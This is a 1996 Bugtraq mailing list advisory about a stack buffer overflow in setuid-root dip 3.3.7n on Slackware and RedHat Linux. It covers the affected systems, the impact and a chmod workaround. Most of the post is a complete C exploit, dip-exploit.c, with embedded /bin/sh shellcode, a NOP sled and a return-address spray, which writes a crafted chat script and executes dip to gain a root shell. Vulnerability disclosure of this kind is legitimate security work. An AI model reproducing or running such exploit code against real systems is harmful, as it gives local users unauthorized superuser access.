Bugtraq mailing list archives

Linux: dip security hole

From: djw () ccwf cc utexas edu (Dan Walters)
Date: Sun, 21 Jan 1996 14:34:22 -0600


PROGRAM:                dip 3.3.7n, and probably other variants

AFFECTED SYSTEMS:       Linux - Slackware 3.0 and RedHat 2.1 verified,
                        others unknown.

IMPACT:                 Local users can get superuser privleges.

SYNOPSIS:               Some Linux distributions come with dip setuid
                        root by default.  There are multiple points in
                        dip where an unbounded buffer is used with user
                        supplied data making possible a stack overflow.
                        Functions in which this appears to be possible
                        include do_chatkey() and mdm_dial().

WORKAROUND:             It is suggested that at least until the source
                        has been further scrutinized that dip not be
                        setuid unless necessary.

                        chmod 0755 dip

                        If you must have dip setuid, place it in a group
                        where it can only be executed by trusted users.

SAMPLE EXPLOIT:

/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_DIP "/usr/sbin/dip"

u_char shell[] = /* courtesy of avalon  ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

u_long esp() { __asm__("movl %esp, %eax"); }

main()
{
  u_char buf[1024];
  u_long addr;
  int i, f;

  strcpy(buf, "chatkey ");
  addr = esp() - 192;
  for (i=8; i<128+16; i+=4)
    *((u_long *) (buf+i)) = addr;
  for (i=128+16; i<512; i++)
    buf[i] = 0x90;
  for (i=0; i<strlen(shell); i++)
    buf[512+i] = shell[i];
  buf[512+i] = '\n';

  if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
    perror("temp.dip");
    exit(0);
  }
  write(f, buf, 512+i);
  close(f);

  execl(PATH_DIP, "dip", "temp.dip", (char *)0);
}

--------------------------------------------------------------------
Dan Walters
djw () mail utexas edu

Current thread:

Re: World writable devices in Irix? Lack Mr G M (Jan 02)
- Re: World writable devices in Irix? Douglas Siebert (Jan 03)
- Linux: dip security hole Dan Walters (Jan 21)
- Linux RedHat dump security hole David J Meltzer (Jan 23)
- <Possible follow-ups>
- Re: World writable devices in Irix? Brad Powell (Jan 03)
  - Linux SPLITVT bug (again) ALEXANDER SCHUETZ (Jan 04)